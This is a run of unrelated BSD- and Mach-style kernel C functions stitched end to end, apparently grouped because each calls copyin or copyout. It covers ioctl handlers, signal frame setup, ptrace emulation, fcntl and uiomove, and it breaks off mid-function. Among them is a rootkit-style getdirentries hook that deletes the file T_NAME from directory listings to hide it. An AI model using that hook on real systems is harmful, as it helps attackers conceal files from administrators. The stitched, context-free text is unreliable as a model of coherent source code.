static int uhid_ioctl(struct usb_fifo *fifo, u_long cmd, void *addr, int fflags) { struct uhid_softc *sc = usb_fifo_softc(fifo); struct usb_gen_descriptor *ugd; uint32_t size; int error = 0; uint8_t id; switch (cmd) { case USB_GET_REPORT_DESC: ugd = addr; if (sc->sc_repdesc_size > ugd->ugd_maxlen) { size = ugd->ugd_maxlen; } else { size = sc->sc_repdesc_size; } ugd->ugd_actlen = size; if (ugd->ugd_data == NULL) break; /* descriptor length only */ error = copyout(sc->sc_repdesc_ptr, ugd->ugd_data, size); break; case USB_SET_IMMED: if (!(fflags & FREAD)) { error = EPERM; break; } if (*(int *)addr) { /* do a test read */ error = uhid_get_report(sc, UHID_INPUT_REPORT, sc->sc_iid, NULL, NULL, sc->sc_isize); if (error) { break; } mtx_lock(&sc->sc_mtx); sc->sc_flags |= UHID_FLAG_IMMED; mtx_unlock(&sc->sc_mtx); } else { mtx_lock(&sc->sc_mtx); sc->sc_flags &= ~UHID_FLAG_IMMED; mtx_unlock(&sc->sc_mtx); } break; case USB_GET_REPORT: if (!(fflags & FREAD)) { error = EPERM; break; } ugd = addr; switch (ugd->ugd_report_type) { case UHID_INPUT_REPORT: size = sc->sc_isize; id = sc->sc_iid; break; case UHID_OUTPUT_REPORT: size = sc->sc_osize; id = sc->sc_oid; break; case UHID_FEATURE_REPORT: size = sc->sc_fsize; id = sc->sc_fid; break; default: return (EINVAL); } if (id != 0) copyin(ugd->ugd_data, &id, 1); error = uhid_get_report(sc, ugd->ugd_report_type, id, NULL, ugd->ugd_data, imin(ugd->ugd_maxlen, size)); break; case USB_SET_REPORT: if (!(fflags & FWRITE)) { error = EPERM; break; } ugd = addr; switch (ugd->ugd_report_type) { case UHID_INPUT_REPORT: size = sc->sc_isize; id = sc->sc_iid; break; case UHID_OUTPUT_REPORT: size = sc->sc_osize; id = sc->sc_oid; break; case UHID_FEATURE_REPORT: size = sc->sc_fsize; id = sc->sc_fid; break; default: return (EINVAL); } if (id != 0) copyin(ugd->ugd_data, &id, 1); error = uhid_set_report(sc, ugd->ugd_report_type, id, NULL, ugd->ugd_data, imin(ugd->ugd_maxlen, size)); break; case USB_GET_REPORT_ID: *(int *)addr = 0; /* XXX: we only support reportid 0? */ break; default: error = EINVAL; break; } return (error); }
mach_msg_return_t mach_msg_receive_results(void) { thread_t self = current_thread(); ipc_space_t space = current_space(); vm_map_t map = current_map(); ipc_object_t object = self->ith_object; mach_msg_return_t mr = self->ith_state; mach_vm_address_t msg_addr = self->ith_msg_addr; mach_msg_option_t option = self->ith_option; ipc_kmsg_t kmsg = self->ith_kmsg; mach_port_seqno_t seqno = self->ith_seqno; mach_msg_trailer_size_t trailer_size; io_release(object); if (mr != MACH_MSG_SUCCESS) { if (mr == MACH_RCV_TOO_LARGE ) { if (option & MACH_RCV_LARGE) { /* * We need to inform the user-level code that it needs more * space. The value for how much space was returned in the * msize save area instead of the message (which was left on * the queue). */ if (option & MACH_RCV_LARGE_IDENTITY) { if (copyout((char *) &self->ith_receiver_name, msg_addr + offsetof(mach_msg_user_header_t, msgh_local_port), sizeof(mach_port_name_t))) mr = MACH_RCV_INVALID_DATA; } if (copyout((char *) &self->ith_msize, msg_addr + offsetof(mach_msg_user_header_t, msgh_size), sizeof(mach_msg_size_t))) mr = MACH_RCV_INVALID_DATA; } else { /* discard importance in message */ ipc_importance_clean(kmsg); if (msg_receive_error(kmsg, msg_addr, option, seqno, space) == MACH_RCV_INVALID_DATA) mr = MACH_RCV_INVALID_DATA; } } return mr; } #if IMPORTANCE_INHERITANCE /* adopt/transform any importance attributes carried in the message */ ipc_importance_receive(kmsg, option); #endif /* IMPORTANCE_INHERITANCE */ trailer_size = ipc_kmsg_add_trailer(kmsg, space, option, self, seqno, FALSE, kmsg->ikm_header->msgh_remote_port->ip_context); mr = ipc_kmsg_copyout(kmsg, space, map, MACH_MSG_BODY_NULL, option); if (mr != MACH_MSG_SUCCESS) { /* already received importance, so have to undo that here */ ipc_importance_unreceive(kmsg, option); if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) { if (ipc_kmsg_put(msg_addr, kmsg, kmsg->ikm_header->msgh_size + trailer_size) == MACH_RCV_INVALID_DATA) mr = MACH_RCV_INVALID_DATA; } else { if (msg_receive_error(kmsg, msg_addr, option, seqno, space) == MACH_RCV_INVALID_DATA) mr = MACH_RCV_INVALID_DATA; } } else { mr = ipc_kmsg_put(msg_addr, kmsg, kmsg->ikm_header->msgh_size + trailer_size); } return mr; }
void sendsig(sig_t catcher, ksiginfo_t *ksi, sigset_t *mask) { struct sigframe *fp, frame; struct sysentvec *sysent; struct trapframe *tf; struct sigacts *psp; struct thread *td; struct proc *p; int onstack; int code; int sig; td = curthread; p = td->td_proc; PROC_LOCK_ASSERT(p, MA_OWNED); sig = ksi->ksi_signo; code = ksi->ksi_code; psp = p->p_sigacts; mtx_assert(&psp->ps_mtx, MA_OWNED); tf = td->td_frame; onstack = sigonstack(tf->tf_sp); CTR4(KTR_SIG, "sendsig: td=%p (%s) catcher=%p sig=%d", td, p->p_comm, catcher, sig); /* Allocate and validate space for the signal handler context. */ if ((td->td_pflags & TDP_ALTSTACK) != 0 && !onstack && SIGISMEMBER(psp->ps_sigonstack, sig)) { fp = (struct sigframe *)((uintptr_t)td->td_sigstk.ss_sp + td->td_sigstk.ss_size); } else { fp = (struct sigframe *)td->td_frame->tf_sp; } /* Make room, keeping the stack aligned */ fp--; fp = (struct sigframe *)STACKALIGN(fp); /* Fill in the frame to copy out */ get_mcontext(td, &frame.sf_uc.uc_mcontext, 0); get_fpcontext(td, &frame.sf_uc.uc_mcontext); frame.sf_si = ksi->ksi_info; frame.sf_uc.uc_sigmask = *mask; frame.sf_uc.uc_stack.ss_flags = (td->td_pflags & TDP_ALTSTACK) ? ((onstack) ? SS_ONSTACK : 0) : SS_DISABLE; frame.sf_uc.uc_stack = td->td_sigstk; mtx_unlock(&psp->ps_mtx); PROC_UNLOCK(td->td_proc); /* Copy the sigframe out to the user's stack. */ if (copyout(&frame, fp, sizeof(*fp)) != 0) { /* Process has trashed its stack. Kill it. */ CTR2(KTR_SIG, "sendsig: sigexit td=%p fp=%p", td, fp); PROC_LOCK(p); sigexit(td, SIGILL); } tf->tf_a[0] = sig; tf->tf_a[1] = (register_t)&fp->sf_si; tf->tf_a[2] = (register_t)&fp->sf_uc; tf->tf_sepc = (register_t)catcher; tf->tf_sp = (register_t)fp; sysent = p->p_sysent; if (sysent->sv_sigcode_base != 0) tf->tf_ra = (register_t)sysent->sv_sigcode_base; else tf->tf_ra = (register_t)(sysent->sv_psstrings - *(sysent->sv_szsigcode)); CTR3(KTR_SIG, "sendsig: return td=%p pc=%#x sp=%#x", td, tf->tf_sepc, tf->tf_sp); PROC_LOCK(p); mtx_lock(&psp->ps_mtx); }
static void netbsd32_sendsig_siginfo(const ksiginfo_t *ksi, const sigset_t *mask) { struct lwp *l = curlwp; struct proc *p = l->l_proc; struct sigacts *ps = p->p_sigacts; int onstack; int sig = ksi->ksi_signo; ucontext32_t uc; struct sparc32_sigframe_siginfo *fp; netbsd32_intptr_t catcher; struct trapframe64 *tf = l->l_md.md_tf; struct rwindow32 *oldsp, *newsp; int ucsz, error; /* Need to attempt to zero extend this 32-bit pointer */ oldsp = (struct rwindow32*)(u_long)(u_int)tf->tf_out[6]; /* Do we need to jump onto the signal stack? */ onstack = (l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 && (SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0; /* Allocate space for the signal handler context. */ if (onstack) fp = (struct sparc32_sigframe_siginfo *) ((char *)l->l_sigstk.ss_sp + l->l_sigstk.ss_size); else fp = (struct sparc32_sigframe_siginfo *)oldsp; fp = (struct sparc32_sigframe_siginfo*)((u_long)(fp - 1) & ~7); /* * Build the signal context to be used by sigreturn. */ uc.uc_flags = _UC_SIGMASK | ((l->l_sigstk.ss_flags & SS_ONSTACK) ? _UC_SETSTACK : _UC_CLRSTACK); uc.uc_sigmask = *mask; uc.uc_link = (uint32_t)(uintptr_t)l->l_ctxlink; memset(&uc.uc_stack, 0, sizeof(uc.uc_stack)); sendsig_reset(l, sig); /* * Now copy the stack contents out to user space. * We need to make sure that when we start the signal handler, * its %i6 (%fp), which is loaded from the newly allocated stack area, * joins seamlessly with the frame it was in when the signal occurred, * so that the debugger and _longjmp code can back up through it. * Since we're calling the handler directly, allocate a full size * C stack frame. */ mutex_exit(p->p_lock); cpu_getmcontext32(l, &uc.uc_mcontext, &uc.uc_flags); ucsz = (int)(intptr_t)&uc.__uc_pad - (int)(intptr_t)&uc; newsp = (struct rwindow32*)((intptr_t)fp - sizeof(struct frame32)); error = (copyout(&ksi->ksi_info, &fp->sf_si, sizeof ksi->ksi_info) || copyout(&uc, &fp->sf_uc, ucsz) || suword(&newsp->rw_in[6], (intptr_t)oldsp)); mutex_enter(p->p_lock); if (error) { /* * Process has trashed its stack; give it an illegal * instruction to halt it in its tracks. */ sigexit(l, SIGILL); /* NOTREACHED */ } switch (ps->sa_sigdesc[sig].sd_vers) { default: /* Unsupported trampoline version; kill the process. */ sigexit(l, SIGILL); case 2: /* * Arrange to continue execution at the user's handler. * It needs a new stack pointer, a return address and * three arguments: (signo, siginfo *, ucontext *). */ catcher = (intptr_t)SIGACTION(p, sig).sa_handler; tf->tf_pc = catcher; tf->tf_npc = catcher + 4; tf->tf_out[0] = sig; tf->tf_out[1] = (intptr_t)&fp->sf_si; tf->tf_out[2] = (intptr_t)&fp->sf_uc; tf->tf_out[6] = (intptr_t)newsp; tf->tf_out[7] = (intptr_t)ps->sa_sigdesc[sig].sd_tramp - 8; break; } /* Remember that we're now on the signal stack. */ if (onstack) l->l_sigstk.ss_flags |= SS_ONSTACK; }
/* * getdirentries system call hook. * Hides the file T_NAME. */ static int getdirentries_hook(struct thread *td, void *syscall_args) { struct getdirentries_args /* { int fd; char *buf; u_int count; long *basep; } */ *uap; uap = (struct getdirentries_args *)syscall_args; struct dirent *dp, *current; unsigned int size, count; /* * Store the directory entries found in fd in buf, and record the * number of bytes actually transferred. */ getdirentries(td, syscall_args); size = td->td_retval[0]; /* Does fd actually contain any directory entries? */ if (size > 0) { MALLOC(dp, struct dirent *, size, M_TEMP, M_NOWAIT); copyin(uap->buf, dp, size); current = dp; count = size; /* * Iterate through the directory entries found in fd. * Note: The last directory entry always has a record length * of zero. */ while ((current->d_reclen != 0) && (count > 0)) { count -= current->d_reclen; /* Do we want to hide this file? */ if(strcmp((char *)&(current->d_name), T_NAME) == 0) { /* * Copy every directory entry found after * T_NAME over T_NAME, effectively cutting it * out. */ if (count != 0) bcopy((char *)current + current->d_reclen, current, count); size -= current->d_reclen; break; } /* * Are there still more directory entries to * look through? */ if (count != 0) /* Advance to the next record. */ current = (struct dirent *)((char *)current + current->d_reclen); } /* * If T_NAME was found in fd, adjust the "return values" to * hide it. If T_NAME wasn't found...don't worry 'bout it. */ td->td_retval[0] = size; copyout(dp, uap->buf, size); FREE(dp, M_TEMP); } return(0); }
int statis_upd(caddr_t adr) { (void) copyout(statis, adr, sizeof (struct statis) * sind); return (sind); }
static int load_coff_section(struct vmspace *vmspace, struct vnode *vp, vm_offset_t offset, caddr_t vmaddr, size_t memsz, size_t filsz, vm_prot_t prot) { size_t map_len; vm_offset_t map_offset; vm_offset_t map_addr; int error; unsigned char *data_buf = 0; size_t copy_len; map_offset = trunc_page(offset); map_addr = trunc_page((vm_offset_t)vmaddr); if (memsz > filsz) { /* * We have the stupid situation that * the section is longer than it is on file, * which means it has zero-filled areas, and * we have to work for it. Stupid iBCS! */ map_len = trunc_page(offset + filsz) - trunc_page(map_offset); } else { /* * The only stuff we care about is on disk, and we * don't care if we map in more than is really there. */ map_len = round_page(offset + filsz) - trunc_page(map_offset); } DPRINTF(("%s(%d): vm_mmap(&vmspace->vm_map, &0x%08jx, 0x%x, 0x%x, " "VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp, 0x%x)\n", __FILE__, __LINE__, (uintmax_t)map_addr, map_len, prot, map_offset)); if ((error = vm_mmap(&vmspace->vm_map, &map_addr, map_len, prot, VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp, map_offset)) != 0) return error; if (memsz == filsz) { /* We're done! */ return 0; } /* * Now we have screwball stuff, to accomodate stupid COFF. * We have to map the remaining bit of the file into the kernel's * memory map, allocate some anonymous memory, copy that last * bit into it, and then we're done. *sigh* * For clean-up reasons, we actally map in the file last. */ copy_len = (offset + filsz) - trunc_page(offset + filsz); map_addr = trunc_page((vm_offset_t)vmaddr + filsz); map_len = round_page((vm_offset_t)vmaddr + memsz) - map_addr; DPRINTF(("%s(%d): vm_map_find(&vmspace->vm_map, NULL, 0, &0x%08jx,0x%x, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0)\n", __FILE__, __LINE__, (uintmax_t)map_addr, map_len)); if (map_len != 0) { error = vm_map_find(&vmspace->vm_map, NULL, 0, &map_addr, map_len, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0); if (error) return (vm_mmap_to_errno(error)); } if ((error = vm_mmap(exec_map, (vm_offset_t *) &data_buf, PAGE_SIZE, VM_PROT_READ, VM_PROT_READ, 0, OBJT_VNODE, vp, trunc_page(offset + filsz))) != 0) return error; error = copyout(data_buf, (caddr_t) map_addr, copy_len); if (vm_map_remove(exec_map, (vm_offset_t) data_buf, (vm_offset_t) data_buf + PAGE_SIZE)) panic("load_coff_section vm_map_remove failed"); return error; }
static int tws_passthru(struct tws_softc *sc, void *buf) { struct tws_request *req; struct tws_ioctl_no_data_buf *ubuf = (struct tws_ioctl_no_data_buf *)buf; int error; u_int16_t lun4; if ( tws_get_state(sc) == TWS_RESET ) { return(EBUSY); } do { req = tws_get_request(sc, TWS_PASSTHRU_REQ); if ( !req ) { sc->chan = 1; error = tsleep((void *)&sc->chan, 0, "tws_sleep", TWS_IO_TIMEOUT*hz); if ( error == EWOULDBLOCK ) { return(ETIMEDOUT); } } else { break; } }while(1); req->length = ubuf->driver_pkt.buffer_length; TWS_TRACE_DEBUG(sc, "datal,rid", req->length, req->request_id); if ( req->length ) { req->data = kmalloc(req->length, M_TWS, M_WAITOK | M_ZERO); error = copyin(ubuf->pdata, req->data, req->length); } req->flags = TWS_DIR_IN | TWS_DIR_OUT; req->cb = tws_passthru_complete; memcpy(&req->cmd_pkt->cmd, &ubuf->cmd_pkt.cmd, sizeof(struct tws_command_apache)); if ( GET_OPCODE(req->cmd_pkt->cmd.pkt_a.res__opcode) == TWS_FW_CMD_EXECUTE_SCSI ) { lun4 = req->cmd_pkt->cmd.pkt_a.lun_l4__req_id & 0xF000; req->cmd_pkt->cmd.pkt_a.lun_l4__req_id = lun4 | req->request_id; } else { req->cmd_pkt->cmd.pkt_g.generic.request_id = (u_int8_t) req->request_id; } lockmgr(&sc->gen_lock, LK_EXCLUSIVE); req->error_code = tws_map_request(sc, req); error = lksleep(req, &sc->gen_lock, 0, "tws_passthru", TWS_IO_TIMEOUT*hz); if ( error == EWOULDBLOCK ) { error = ETIMEDOUT; TWS_TRACE_DEBUG(sc, "lksleep timeout", error, req->request_id); tws_reset((void *)sc); } if ( req->error_code == TWS_REQ_REQUEUE ) { error = EBUSY; } tws_unmap_request(sc, req); memcpy(&ubuf->cmd_pkt.hdr, &req->cmd_pkt->hdr, sizeof(struct tws_command_apache)); memcpy(&ubuf->cmd_pkt.cmd, &req->cmd_pkt->cmd, sizeof(struct tws_command_apache)); if ( !error && req->length ) { error = copyout(req->data, ubuf->pdata, req->length); } kfree(req->data, M_TWS); req->state = TWS_REQ_STATE_FREE; lockmgr(&sc->gen_lock, LK_RELEASE); if ( error ) TWS_TRACE_DEBUG(sc, "errored", error, 0); if ( req->error_code != TWS_REQ_SUBMIT_SUCCESS ) ubuf->driver_pkt.os_status = error; if ( sc->chan && tws_get_state(sc) != TWS_RESET ) { sc->chan = 0; wakeup((void *)&sc->chan); } return(error); }
int linux_ptrace(struct thread *td, struct linux_ptrace_args *uap) { union { struct linux_pt_reg reg; struct linux_pt_fpreg fpreg; struct linux_pt_fpxreg fpxreg; } r; union { struct reg bsd_reg; struct fpreg bsd_fpreg; struct dbreg bsd_dbreg; } u; void *addr; pid_t pid; int error, req; error = 0; /* by default, just copy data intact */ req = uap->req; pid = (pid_t)uap->pid; addr = (void *)uap->addr; switch (req) { case PTRACE_TRACEME: case PTRACE_POKETEXT: case PTRACE_POKEDATA: case PTRACE_KILL: error = kern_ptrace(td, req, pid, addr, uap->data); break; case PTRACE_PEEKTEXT: case PTRACE_PEEKDATA: { /* need to preserve return value */ int rval = td->td_retval[0]; error = kern_ptrace(td, req, pid, addr, 0); if (error == 0) error = copyout(td->td_retval, (void *)uap->data, sizeof(l_int)); td->td_retval[0] = rval; break; } case PTRACE_DETACH: error = kern_ptrace(td, PT_DETACH, pid, (void *)1, map_signum(uap->data)); break; case PTRACE_SINGLESTEP: case PTRACE_CONT: error = kern_ptrace(td, req, pid, (void *)1, map_signum(uap->data)); break; case PTRACE_ATTACH: error = kern_ptrace(td, PT_ATTACH, pid, addr, uap->data); break; case PTRACE_GETREGS: /* Linux is using data where FreeBSD is using addr */ error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0); if (error == 0) { map_regs_to_linux(&u.bsd_reg, &r.reg); error = copyout(&r.reg, (void *)uap->data, sizeof(r.reg)); } break; case PTRACE_SETREGS: /* Linux is using data where FreeBSD is using addr */ error = copyin((void *)uap->data, &r.reg, sizeof(r.reg)); if (error == 0) { map_regs_from_linux(&u.bsd_reg, &r.reg); error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0); } break; case PTRACE_GETFPREGS: /* Linux is using data where FreeBSD is using addr */ error = kern_ptrace(td, PT_GETFPREGS, pid, &u.bsd_fpreg, 0); if (error == 0) { map_fpregs_to_linux(&u.bsd_fpreg, &r.fpreg); error = copyout(&r.fpreg, (void *)uap->data, sizeof(r.fpreg)); } break; case PTRACE_SETFPREGS: /* Linux is using data where FreeBSD is using addr */ error = copyin((void *)uap->data, &r.fpreg, sizeof(r.fpreg)); if (error == 0) { map_fpregs_from_linux(&u.bsd_fpreg, &r.fpreg); error = kern_ptrace(td, PT_SETFPREGS, pid, &u.bsd_fpreg, 0); } break; case PTRACE_SETFPXREGS: error = copyin((void *)uap->data, &r.fpxreg, sizeof(r.fpxreg)); if (error) break; /* FALL THROUGH */ case PTRACE_GETFPXREGS: { struct proc *p; struct thread *td2; if (sizeof(struct linux_pt_fpxreg) != sizeof(struct savexmm)) { static int once = 0; if (!once) { printf("linux: savexmm != linux_pt_fpxreg\n"); once = 1; } error = EIO; break; } if ((p = pfind(uap->pid)) == NULL) { error = ESRCH; break; } /* Exiting processes can't be debugged. */ if ((p->p_flag & P_WEXIT) != 0) { error = ESRCH; goto fail; } if ((error = p_candebug(td, p)) != 0) goto fail; /* System processes can't be debugged. */ if ((p->p_flag & P_SYSTEM) != 0) { error = EINVAL; goto fail; } /* not being traced... */ if ((p->p_flag & P_TRACED) == 0) { error = EPERM; goto fail; } /* not being traced by YOU */ if (p->p_pptr != td->td_proc) { error = EBUSY; goto fail; } /* not currently stopped */ if (!P_SHOULDSTOP(p) || (p->p_flag & P_WAITED) == 0) { error = EBUSY; goto fail; } if (req == PTRACE_GETFPXREGS) { _PHOLD(p); /* may block */ td2 = FIRST_THREAD_IN_PROC(p); error = linux_proc_read_fpxregs(td2, &r.fpxreg); _PRELE(p); PROC_UNLOCK(p); if (error == 0) error = copyout(&r.fpxreg, (void *)uap->data, sizeof(r.fpxreg)); } else { /* clear dangerous bits exactly as Linux does*/ r.fpxreg.mxcsr &= 0xffbf; _PHOLD(p); /* may block */ td2 = FIRST_THREAD_IN_PROC(p); error = linux_proc_write_fpxregs(td2, &r.fpxreg); _PRELE(p); PROC_UNLOCK(p); } break; fail: PROC_UNLOCK(p); break; } case PTRACE_PEEKUSR: case PTRACE_POKEUSR: { error = EIO; /* check addr for alignment */ if (uap->addr < 0 || uap->addr & (sizeof(l_int) - 1)) break; /* * Allow linux programs to access register values in * user struct. We simulate this through PT_GET/SETREGS * as necessary. */ if (uap->addr < sizeof(struct linux_pt_reg)) { error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0); if (error != 0) break; map_regs_to_linux(&u.bsd_reg, &r.reg); if (req == PTRACE_PEEKUSR) { error = copyout((char *)&r.reg + uap->addr, (void *)uap->data, sizeof(l_int)); break; } *(l_int *)((char *)&r.reg + uap->addr) = (l_int)uap->data; map_regs_from_linux(&u.bsd_reg, &r.reg); error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0); } /* * Simulate debug registers access */ if (uap->addr >= LINUX_DBREG_OFFSET && uap->addr <= LINUX_DBREG_OFFSET + LINUX_DBREG_SIZE) { error = kern_ptrace(td, PT_GETDBREGS, pid, &u.bsd_dbreg, 0); if (error != 0) break; uap->addr -= LINUX_DBREG_OFFSET; if (req == PTRACE_PEEKUSR) { error = copyout((char *)&u.bsd_dbreg + uap->addr, (void *)uap->data, sizeof(l_int)); break; } *(l_int *)((char *)&u.bsd_dbreg + uap->addr) = uap->data; error = kern_ptrace(td, PT_SETDBREGS, pid, &u.bsd_dbreg, 0); } break; } case LINUX_PTRACE_SYSCALL: /* fall through */ default: printf("linux: ptrace(%u, ...) not implemented\n", (unsigned int)uap->req); error = EINVAL; break; } return (error); }
/* * Ioctl system call */ int anp_ioctl(int fd,int ucom,caddr_t udata) { struct socket *sock; register int com, error; register u_int size; caddr_t data, memp; int tmp; #define STK_PARAMS 128 char stkbuf[STK_PARAMS]; MU_LOCK(kern_lock_p); sock=anp_fdfind(fd); com=ucom; /* AC: since we don't support exec() in sim. environment, we don't support * these ioctl's either... */ #ifdef NOPE switch (com = ucom) { case FIONCLEX: fdp->fd_ofileflags[uap->fd] &= ~UF_EXCLOSE; MU_UNLOCK(kern_lock_p); return (0); case FIOCLEX: fdp->fd_ofileflags[uap->fd] |= UF_EXCLOSE; MU_UNLOCK(kern_lock_p); return (0); } #endif /* * Interpret high order word to find amount of data to be * copied to/from the user's address space. */ size = IOCPARM_LEN(com); if (size > IOCPARM_MAX) { anp_errno=ENOTTY; MU_UNLOCK(kern_lock_p); return -1; } memp = NULL; if (size > sizeof (stkbuf)) { memp = (caddr_t)anp_sys_malloc((u_long)size, M_IOCTLOPS, M_WAITOK); data = memp; } else data = stkbuf; if (com&IOC_IN) { if (size) { error = copyin(udata, data, (u_int)size); if (error) { if (memp) anp_sys_free(memp, M_IOCTLOPS); anp_errno=error; MU_UNLOCK(kern_lock_p); return -1; } } else *(caddr_t *)data = udata; } else if ((com&IOC_OUT) && size) /* * Zero the buffer so the user always * gets back something deterministic. */ bzero(data, size); else if (com&IOC_VOID) *(caddr_t *)data = udata; switch (com) { case FIONBIO: case FIOASYNC: tmp = *((int *) data); error = (soo_ioctl)(sock, com, (caddr_t)&tmp); break; #ifdef NOPE case FIOSETOWN: tmp = *((int *)data); if (fp->f_type == DTYPE_SOCKET) { ((struct socket *)fp->f_data)->so_pgid = tmp; error = 0; break; } if (tmp <= 0) { tmp = -tmp; } else { struct proc *p1 = pfind(tmp); if (p1 == 0) { error = ESRCH; break; } tmp = p1->p_pgrp->pg_id; } error = (*fp->f_ops->fo_ioctl) (fp, (int)TIOCSPGRP, (caddr_t)&tmp, p); break; case FIOGETOWN: if (fp->f_type == DTYPE_SOCKET) { error = 0; *(int *)data = ((struct socket *)fp->f_data)->so_pgid; break; } error = (*fp->f_ops->fo_ioctl)(fp, (int)TIOCGPGRP, data, p); *(int *)data = -*(int *)data; break; #endif default: error = soo_ioctl(sock, com, data); /* * Copy any data to user, size was * already set and checked above. */ if (error == 0 && (com&IOC_OUT) && size) error = copyout(data, udata, (u_int)size); break; } if (memp) anp_sys_free(memp, M_IOCTLOPS); anp_errno=error; MU_UNLOCK(kern_lock_p); if (anp_errno!=0) { return -1; } else { return 0; } }
int uiomove(void *ptr, size_t n, struct uio *uio) { struct iovec *iov; size_t size; int result; if (uio->uio_rw != UIO_READ && uio->uio_rw != UIO_WRITE) { panic("uiomove: Invalid uio_rw %d\n", (int) uio->uio_rw); } if (uio->uio_segflg==UIO_SYSSPACE) { KASSERT(uio->uio_space == NULL); } else { KASSERT(uio->uio_space == curthread->t_addrspace); } while (n > 0 && uio->uio_resid > 0) { /* get the first iovec */ iov = uio->uio_iov; size = iov->iov_len; if (size > n) { size = n; } if (size == 0) { /* move to the next iovec and try again */ uio->uio_iov++; uio->uio_iovcnt--; if (uio->uio_iovcnt == 0) { /* * This should only happen if you set * uio_resid incorrectly (to more than * the total length of buffers the uio * points to). */ panic("uiomove: ran out of buffers\n"); } continue; } switch (uio->uio_segflg) { case UIO_SYSSPACE: result = 0; if (uio->uio_rw == UIO_READ) { memmove(iov->iov_kbase, ptr, size); } else { memmove(ptr, iov->iov_kbase, size); } iov->iov_kbase = ((char *)iov->iov_kbase+size); break; case UIO_USERSPACE: case UIO_USERISPACE: if (uio->uio_rw == UIO_READ) { result = copyout(ptr, iov->iov_ubase,size); } else { result = copyin(iov->iov_ubase, ptr, size); } if (result) { return result; } iov->iov_ubase += size; break; default: panic("uiomove: Invalid uio_segflg %d\n", (int)uio->uio_segflg); } iov->iov_len -= size; uio->uio_resid -= size; uio->uio_offset += size; ptr = ((char *)ptr + size); n -= size; } return 0; }
/* * The file control system call. */ int sys_fcntl(struct lwp *l, const struct sys_fcntl_args *uap, register_t *retval) { /* { syscallarg(int) fd; syscallarg(int) cmd; syscallarg(void *) arg; } */ int fd, i, tmp, error, cmd, newmin; filedesc_t *fdp; file_t *fp; struct flock fl; bool cloexec = false; fd = SCARG(uap, fd); cmd = SCARG(uap, cmd); fdp = l->l_fd; error = 0; switch (cmd) { case F_CLOSEM: if (fd < 0) return EBADF; while ((i = fdp->fd_lastfile) >= fd) { if (fd_getfile(i) == NULL) { /* Another thread has updated. */ continue; } fd_close(i); } return 0; case F_MAXFD: *retval = fdp->fd_lastfile; return 0; case F_SETLKW: case F_SETLK: case F_GETLK: error = copyin(SCARG(uap, arg), &fl, sizeof(fl)); if (error) return error; error = do_fcntl_lock(fd, cmd, &fl); if (cmd == F_GETLK && error == 0) error = copyout(&fl, SCARG(uap, arg), sizeof(fl)); return error; default: /* Handled below */ break; } if ((fp = fd_getfile(fd)) == NULL) return (EBADF); if ((cmd & F_FSCTL)) { error = fcntl_forfs(fd, fp, cmd, SCARG(uap, arg)); fd_putfile(fd); return error; } switch (cmd) { case F_DUPFD_CLOEXEC: cloexec = true; /*FALLTHROUGH*/ case F_DUPFD: newmin = (long)SCARG(uap, arg); if ((u_int)newmin >= l->l_proc->p_rlimit[RLIMIT_NOFILE].rlim_cur || (u_int)newmin >= maxfiles) { fd_putfile(fd); return EINVAL; } error = fd_dup(fp, newmin, &i, cloexec); *retval = i; break; case F_GETFD: *retval = fdp->fd_dt->dt_ff[fd]->ff_exclose; break; case F_SETFD: fd_set_exclose(l, fd, ((long)SCARG(uap, arg) & FD_CLOEXEC) != 0); break; case F_GETNOSIGPIPE: *retval = (fp->f_flag & FNOSIGPIPE) != 0; break; case F_SETNOSIGPIPE: if (SCARG(uap, arg)) atomic_or_uint(&fp->f_flag, FNOSIGPIPE); else atomic_and_uint(&fp->f_flag, ~FNOSIGPIPE); *retval = 0; break; case F_GETFL: *retval = OFLAGS(fp->f_flag); break; case F_SETFL: /* XXX not guaranteed to be atomic. */ tmp = FFLAGS((long)SCARG(uap, arg)) & FCNTLFLAGS; error = (*fp->f_ops->fo_fcntl)(fp, F_SETFL, &tmp); if (error) break; i = tmp ^ fp->f_flag; if (i & FNONBLOCK) { int flgs = tmp & FNONBLOCK; error = (*fp->f_ops->fo_ioctl)(fp, FIONBIO, &flgs); if (error) { (*fp->f_ops->fo_fcntl)(fp, F_SETFL, &fp->f_flag); break; } } if (i & FASYNC) { int flgs = tmp & FASYNC; error = (*fp->f_ops->fo_ioctl)(fp, FIOASYNC, &flgs); if (error) { if (i & FNONBLOCK) { tmp = fp->f_flag & FNONBLOCK; (void)(*fp->f_ops->fo_ioctl)(fp, FIONBIO, &tmp); } (*fp->f_ops->fo_fcntl)(fp, F_SETFL, &fp->f_flag); break; } } fp->f_flag = (fp->f_flag & ~FCNTLFLAGS) | tmp; break; case F_GETOWN: error = (*fp->f_ops->fo_ioctl)(fp, FIOGETOWN, &tmp); *retval = tmp; break; case F_SETOWN: tmp = (int)(uintptr_t) SCARG(uap, arg); error = (*fp->f_ops->fo_ioctl)(fp, FIOSETOWN, &tmp); break; default: error = EINVAL; } fd_putfile(fd); return (error); }
/* * Read a block of directory entries in a file system independent format. */ int compat_43_sys_getdirentries(struct lwp *l, const struct compat_43_sys_getdirentries_args *uap, register_t *retval) { /* { syscallarg(int) fd; syscallarg(char *) buf; syscallarg(u_int) count; syscallarg(long *) basep; } */ struct dirent *bdp; struct vnode *vp; void *tbuf; /* Current-format */ char *inp; /* Current-format */ int len, reclen; /* Current-format */ char *outp; /* Dirent12-format */ int resid, old_reclen = 0; /* Dirent12-format */ struct file *fp; struct uio auio; struct iovec aiov; struct dirent43 idb; off_t off; /* true file offset */ int buflen, error, eofflag, nbytes; struct vattr va; off_t *cookiebuf = NULL, *cookie; int ncookies; long loff; /* fd_getvnode() will use the descriptor for us */ if ((error = fd_getvnode(SCARG(uap, fd), &fp)) != 0) return (error); if ((fp->f_flag & FREAD) == 0) { error = EBADF; goto out1; } vp = fp->f_vnode; if (vp->v_type != VDIR) { error = ENOTDIR; goto out1; } vn_lock(vp, LK_SHARED | LK_RETRY); error = VOP_GETATTR(vp, &va, 